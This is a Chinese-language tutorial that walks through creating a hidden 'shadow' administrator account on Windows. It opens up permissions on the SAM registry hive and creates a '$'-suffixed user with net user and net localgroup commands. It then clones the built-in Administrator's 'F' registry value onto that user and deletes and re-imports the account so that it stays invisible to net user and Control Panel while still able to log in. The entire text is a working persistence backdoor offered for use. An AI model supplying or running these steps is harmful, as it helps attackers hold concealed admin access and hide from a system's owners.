一、点击“开始”→“运行”(或者按 win+R 组合键),输入“regedit”,回车,打开注册表编辑器,展开HKEY_LOCAL_MACHINE\SAM\SAM\分支,如图:
二、 右击SAM,选择“权限”选中“Administrators (FREESKYC-165D01\Administrators)”,将下面的“完全控制”和“读取”勾为“允许”,应用、确定。
三、 点击“开始”→“运行”(或者按 win+R 组合键),输入“cmd”,回车,打开了命令行,键入如下命令:
net user abc$ 123 /add 回车其中abc$为用户名(abc可以改,但是最后的$符号是必须有的),123为密码
四、 再键入以下命令可以给abc$ 帐户添加管理员权限:net localgroup administrators abc$ /add
五、关闭注册表编辑器,在命令行下敲入 regedit ,打开注册表编辑器,展开
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ 如图:
再展开Names分支
单击“Administrator”,看,右边的“类型”一列为“0x1f4”,于是在左边找到“000001F4”并单击,然后双击右边的“F”,选中如图所示的数据并复制
假设刚才创建的用户是图中的me(记得后面要加 $ 符,否则不能达到隐藏的目的!) ,单击它,在右边的“类型”看到的是0x3f2
在左列找到000003F2并单击,双击右边的“F”选中如图所示的数据
六、 按右键→粘贴,把刚才复制的内容替换上去,确定
七、 在左列选中用户名 me ,然后点击“文件”→“导出”,将其保存(例如保存在桌面,文件名为 1.reg);再选中 000003F2 ,将其导出(例如保存在桌面,文件名为 2.reg)
八、 回到命令行,执行以下命令:net user abc$ /del 即删除 abc 这个帐户
九、 现在可以关闭刚才的所有窗口了,去到1.reg和2.reg所在的文件夹,双击1.reg,点击确定,将其导入注册表,同样,也将2.reg导入。之后这两个文件可以删除了
十、 此时无论是在控制面板还是在命令行下执行 net user 命令,都无法看到 abc$ 这个帐户,但是可以用这个帐户登录!在登录界面按Ctrl+Alt+Del组合键,输入用户名(包括$)和密码就可以登录,与Administrator权限相同!